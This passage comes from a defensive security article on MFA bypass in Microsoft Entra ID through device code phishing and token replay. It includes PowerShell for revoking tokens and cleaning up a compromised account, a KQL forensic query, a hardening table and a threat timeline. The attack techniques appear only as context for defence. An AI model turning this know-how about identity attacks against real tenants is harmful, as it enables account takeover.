@{</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Definition = @(</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        '{\"TokenLifetimePolicy\":{\"Version\":1,\"AccessTokenLifetime\":\"00:30:00\"}}'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    )</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    DisplayName = \"ShortAccessTokenPolicy\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    IsOrganizationDefault = $false</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">New-MgPolicyTokenLifetimePolicy -BodyParameter $tokenLifetimePolicy</span><br></span></code></pre></div></div>\n<p><strong>More impactful: Sign-in Frequency policy in Conditional Access</strong></p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">CA Policy: \"Require re-authentication for sensitive apps\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">─────────────────────────────────────────────────────────</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Assignments:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Users: All users</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Target: Azure portal, Exchange Online (admin operations), Graph Explorer</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Session Controls:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Sign-in frequency: 4 hours (or 1 hour for highest-sensitivity)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Persistent browser session: Never persistent</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">─────────────────────────────────────────────────────────</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-7--incident-response-when-token-theft-is-confirmed\">Part 7  Incident Response When Token Theft Is Confirmed<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#part-7--incident-response-when-token-theft-is-confirmed\" class=\"hash-link\" aria-label=\"Direct link to Part 7  Incident Response When Token Theft Is Confirmed\" title=\"Direct link to Part 7  Incident Response When Token Theft Is Confirmed\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"71-the-revocation-sequence\">7.1 The Revocation Sequence<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#71-the-revocation-sequence\" class=\"hash-link\" aria-label=\"Direct link to 7.1 The Revocation Sequence\" title=\"Direct link to 7.1 The Revocation Sequence\" translate=\"no\">​</a></h3>\n<p>If you have confirmed token theft, here is the exact remediation sequence. <strong>Order matters:</strong></p>\n<!-- -->\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Step 1: Revoke ALL refresh tokens for the affected user</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Connect-MgGraph -Scopes \"User.ReadWrite.All\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$userId = \"victim@company.com\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Invoke-MgRevokeUserSignInSession -UserId $userId</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Verify revocation:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-MgUser -UserId $userId -Property \"signInSessionsValidFromDateTime\" | </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Select-Object signInSessionsValidFromDateTime</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Step 2: Disable account to force block non-CAE clients immediately</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Update-MgUser -UserId $userId -AccountEnabled $false</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Wait 60 minutes, then re-enable</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Step 3: Remove any malicious device registrations</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-MgUserRegisteredDevice -UserId $userId | </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Select-Object Id, DisplayName, RegistrationDateTime, TrustType |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Sort-Object RegistrationDateTime -Descending</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Compare against known-good devices; remove suspicious ones:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Remove-MgUserRegisteredDevice -UserId $userId -DirectoryObjectId \"&lt;suspicious_device_id&gt;\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Step 4: Remove malicious inbox rules created for persistence</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Connect-ExchangeOnline</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-InboxRule -Mailbox $userId | </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Where-Object {$_.DeleteMessage -eq $true -or $_.ForwardTo -ne $null} |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Select-Object Name, ForwardTo, DeleteMessage, MarkAsRead</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Remove any rules not created by the user:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Remove-InboxRule -Mailbox $userId -Identity \"&lt;rule_name&gt;\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Step 5: Remove OAuth application consent grants</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-MgUserOAuth2PermissionGrant -UserId $userId | </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Select-Object ClientId, Scope, ConsentType</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Remove-MgOAuth2PermissionGrant -OAuth2PermissionGrantId \"&lt;grant_id&gt;\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Step 6: Check for new MFA methods added by attacker</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-MgUserAuthenticationMethod -UserId $userId</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Look for unrecognized phone numbers, TOTP authenticators, or FIDO keys</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"72-forensic-timeline-reconstruction\">7.2 Forensic Timeline Reconstruction<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#72-forensic-timeline-reconstruction\" class=\"hash-link\" aria-label=\"Direct link to 7.2 Forensic Timeline Reconstruction\" title=\"Direct link to 7.2 Forensic Timeline Reconstruction\" translate=\"no\">​</a></h3>\n<p>After containment, reconstruct exactly what the attacker accessed:</p>\n<div class=\"language-kql codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kql codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// Full activity reconstruction for a compromised account</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">let CompromisedUser = \"victim@company.com\";</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">let AttackStart = datetime(2025-01-15 23:00:00);</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">let AttackEnd = datetime(2025-01-16 06:00:00);</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// All authentication events</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">SigninLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where TimeGenerated between (AttackStart .. AttackEnd)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where UserPrincipalName == CompromisedUser</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project TimeGenerated, Type=\"Interactive Sign-in\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          Details=strcat(AppDisplayName, \" from \", IPAddress, \" (\", </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          tostring(LocationDetails.countryOrRegion), \")\"),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          AuthProtocol = AuthenticationProtocol,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          Risk = RiskLevelAggregated</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| union (</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    NonInteractiveUserSignInLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where TimeGenerated between (AttackStart .. AttackEnd)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where UserPrincipalName == CompromisedUser</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | project TimeGenerated, Type=\"Silent Token Refresh\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">              Details=strcat(AppDisplayName, \" from \", IPAddress),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">              AuthProtocol = AuthenticationProtocol,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">              Risk = RiskLevelAggregated</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| union (</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    AuditLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where TimeGenerated between (AttackStart .. AttackEnd)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where InitiatedBy.user.userPrincipalName == CompromisedUser</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | project TimeGenerated, Type=\"Directory Action\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">              Details=strcat(OperationName, \": \", tostring(TargetResources[0].displayName)),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">              AuthProtocol=\"N/A\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">              Risk=\"N/A\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by TimeGenerated asc</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project TimeGenerated, Type, Details, AuthProtocol, Risk</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-8--the-hardening-roadmap-what-actually-stops-this\">Part 8  The Hardening Roadmap: What Actually Stops This<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#part-8--the-hardening-roadmap-what-actually-stops-this\" class=\"hash-link\" aria-label=\"Direct link to Part 8  The Hardening Roadmap: What Actually Stops This\" title=\"Direct link to Part 8  The Hardening Roadmap: What Actually Stops This\" translate=\"no\">​</a></h2>\n<table><thead><tr><th>Control</th><th>Priority</th><th>Complexity</th><th>Risk Reduction</th><th>Caveats</th></tr></thead><tbody><tr><td><strong>Block device code flow in CA</strong></td><td>P0</td><td>Low</td><td><strong>Eliminates device code phishing entirely</strong></td><td>Audit first; may break IoT/legacy integrations</td></tr><tr><td><strong>Enable NonInteractiveUserSignInLogs in SIEM</strong></td><td>P0</td><td>Low</td><td>Closes major detection gap</td><td>Log volume increase; ensure retention</td></tr><tr><td><strong>Phishing-resistant MFA (FIDO2 / Passkeys)</strong></td><td>P1</td><td>Medium</td><td>Eliminates AiTM credential theft</td><td>Requires hardware keys or compatible devices</td></tr><tr><td><strong>Block legacy authentication protocols</strong></td><td>P1</td><td>Medium</td><td>Eliminates SMTP/IMAP brute force</td><td>Break legacy apps first; test in report mode</td></tr><tr><td><strong>Require compliant device for all cloud apps</strong></td><td>P1</td><td>High</td><td>Token replay from unmanaged device fails CA</td><td>Requires full Intune enrollment; user friction</td></tr><tr><td><strong>Sign-in frequency: 1–4h for sensitive resources</strong></td><td>P1</td><td>Low</td><td>Limits token replay window</td><td>Re-auth friction for legitimate users</td></tr><tr><td><strong>CAE for Exchange/SharePoint/Teams</strong></td><td>P2</td><td>Low</td><td>Token revocation propagates in minutes</td><td>Requires CAE-capable clients</td></tr><tr><td><strong>Restrict OAuth app consent to admin-approved apps</strong></td><td>P2</td><td>Medium</td><td>Blocks illicit consent attacks</td><td>Administrative overhead for app approvals</td></tr><tr><td><strong>TPM enforcement on all Windows devices</strong></td><td>P2</td><td>High</td><td>Makes PRT extraction infeasible</td><td>Hardware refresh may be required</td></tr><tr><td><strong>Token Protection CA policy (preview)</strong></td><td>P2</td><td>Low</td><td>Binds tokens to specific devices</td><td>Preview feature; limited app support</td></tr></tbody></table>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"phishing-resistant-mfa-what-it-actually-means\">Phishing-Resistant MFA: What It Actually Means<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#phishing-resistant-mfa-what-it-actually-means\" class=\"hash-link\" aria-label=\"Direct link to Phishing-Resistant MFA: What It Actually Means\" title=\"Direct link to Phishing-Resistant MFA: What It Actually Means\" translate=\"no\">​</a></h3>\n<p>\"Phishing-resistant MFA\" specifically refers to authenticator methods where the credential is <strong>cryptographically bound to the relying party origin</strong>  meaning even an AiTM proxy cannot intercept it.</p>\n<p>This applies to:</p>\n<ul>\n<li class=\"\"><strong>FIDO2 security keys</strong> (YubiKey, etc.): The private key never leaves the hardware token; the challenge response is scoped to the exact origin domain</li>\n<li class=\"\"><strong>Windows Hello for Business</strong>: Tied to the device's TPM; cryptographically bound to the sign-in domain</li>\n<li class=\"\"><strong>Certificate-based authentication</strong>: Client certificates with hardware-backed keys</li>\n</ul>\n<p>This does <strong>not</strong> apply to:</p>\n<ul>\n<li class=\"\">TOTP / time-based codes (Microsoft Authenticator code): Can be intercepted by AiTM proxy in real time</li>\n<li class=\"\">Push notifications: Can be phished via MFA fatigue or forwarded</li>\n<li class=\"\">SMS OTP: Can be SIM-swapped</li>\n</ul>\n<!-- -->\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-ciso-summary-what-to-do-monday-morning\">The CISO Summary: What to Do Monday Morning<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#the-ciso-summary-what-to-do-monday-morning\" class=\"hash-link\" aria-label=\"Direct link to The CISO Summary: What to Do Monday Morning\" title=\"Direct link to The CISO Summary: What to Do Monday Morning\" translate=\"no\">​</a></h2>\n<p><strong>1. Run the device code audit query today.</strong> Find out if device code phishing is already happening in your tenant. Pull 30 days of <code>SigninLogs</code> where <code>AuthenticationProtocol == \"deviceCode\"</code>. The results will either be reassuring or immediately actionable.</p>\n<p><strong>2. Ensure <code>NonInteractiveUserSignInLogs</code> are being ingested into your SIEM.</strong> If they're not, you have a blind spot for token replay. This is a configuration change, not a product purchase.</p>\n<p><strong>3. Put the \"Block device code flow\" CA policy into report mode immediately.</strong> See what breaks. You have 30 days of sign-in data to assess impact. Most environments will find near-zero legitimate usage.</p>\n<p><strong>4. Identify your highest-value accounts (executives, IT admins, finance leads).</strong> Enforce FIDO2 hardware keys for these users first. The threat model for a CFO being device-code-phished is categorically different from a general workforce user.</p>\n<p><strong>5. Create a token revocation runbook.</strong> When a token theft incident is confirmed, your team needs to execute the revocation sequence in under 10 minutes. If that process requires a 30-minute approval chain, the attacker has already pivoted.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"timeline-device-code-phishing-from-unknown-to-commodity-20212026\">Timeline: Device Code Phishing From Unknown to Commodity (2021–2026)<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#timeline-device-code-phishing-from-unknown-to-commodity-20212026\" class=\"hash-link\" aria-label=\"Direct link to Timeline: Device Code Phishing From Unknown to Commodity (2021–2026)\" title=\"Direct link to Timeline: Device Code Phishing From Unknown to Commodity (2021–2026)\" translate=\"no\">​</a></h2>\n<table><thead><tr><th>Date</th><th>Event</th></tr></thead><tbody><tr><td><strong>2021</strong></td><td>Secureworks documents OAuth device code phishing targeting Russia-linked threat actors; publishes SquarePhish</td></tr><tr><td><strong>Mid-2024</strong></td><td>Microsoft tracks Storm-2372 (Russia-aligned) using device code phishing against governments, NGOs, and enterprises across 15+ countries</td></tr><tr><td><strong>Feb 2025</strong></td><td>Microsoft publicly discloses Storm-2372 campaign; attributes with high confidence to Russian state actors</td></tr><tr><td><strong>June 2025</strong></td><td>ShinyHunters/Scattered Spider use OAuth token theft via Salesloft/Drift integration to breach Salesforce at 700+ organizations including Cloudflare, Zscaler, Tenable</td></tr><tr><td><strong>Sep 2025</strong></td><td>Proofpoint observes \"highly unusual\" surge in device code phishing campaigns  multiple threat clusters adopt simultaneously</td></tr><tr><td><strong>Oct 2025</strong></td><td>TA2723 (financially motivated) begins using device code phishing at scale  technique crosses from APT to commodity cybercrime</td></tr><tr><td><strong>Dec 2025</strong></td><td>Proofpoint publishes research; SquarePhish2 and Graphish phishing kits publicly documented</td></tr><tr><td><strong>Feb 2026</strong></td><td>EvilTokens PhaaS platform emerges  device code phishing fully commoditized as a service offering</td></tr><tr><td><strong>Apr 2026</strong></td><td>Microsoft documents AI-enabled device code phishing campaign using dynamic code generation and Railway.com backend automation</td></tr></tbody></table>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"references\">References<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#references\" class=\"hash-link\" aria-label=\"Direct link to References\" title=\"Direct link to References\" translate=\"no\">​</a></h2>\n<ul>\n<li class=\"\">Microsoft Security Blog: \"Inside an AI-enabled device code phishing campaign\" (April 2026)</li>\n<li class=\"\">Proofpoint: \"Access granted: phishing with device code authorization for account takeover\" (December 2025)</li>\n<li class=\"\">Dirk-jan Mollema: \"Introducing ROADtools\" and PRT research (roadlib.readthedocs.io)</li>\n<li class=\"\">Ontinue: \"Tycoon 2FA Phishing Kit\" threat intelligence report (2025)</li>\n<li class=\"\">CISA Alert AA25-039A: OAuth 2.0 Device Authorization Abuse</li>\n<li class=\"\">Microsoft Documentation: Conditional Access authentication flows policy</li>\n</ul>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"further-reading\">Further Reading<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#further-reading\" class=\"hash-link\" aria-label=\"Direct link to Further Reading\" title=\"Direct link to Further Reading\" translate=\"no\">​</a></h2>\n<ul>\n<li class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/how-attackers-abuse-entra-id-oauth-without-malware\">How Attackers Abuse Entra ID &amp; OAuth Without Malware</a>  consent abuse, service principal backdoors, and token theft without MFA bypass</li>\n<li class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/apt-initial-access-to-domain-dominance-4-hours\">How APT Groups Pivot from Initial Access to Domain Dominance in Under 4 Hours</a>  what happens after identity is compromised</li>\n<li class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/windows-event-log-architecture-siem-missing-events\">Windows Event Log Architecture: Why Your SIEM Is Missing 30% of Events</a>  verify the sign-in logs feeding your detections are complete</li>\n</ul>",
            "url": "https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access",
            "title": "MFA Bypass in 2025 to 2026: Device Code Phishing, Token Replay, and Why Your Conditional Access Policy Isn't Enough",
            "summary": "How device code phishing, token replay, and PRT abuse bypass MFA in 2025–2026  with KQL detections and Conditional Access hardening for enterprise defenders.",
            "date_modified": "2026-04-17T00:00:00.000Z",
            "author": {
                "name": "Inference Defense",
                "url": "https://inferencedefense.com"
            },
            "tags": [
                "identity-security",
                "threat-intelligence",
                "cloud-security",
                "mfa-bypass",
                "device-code-phishing",
                "token-replay",
                "conditional-access",
                "entra-id",
                "microsoft-365",
                "detection-engineering"
            ]
        }
    ]
}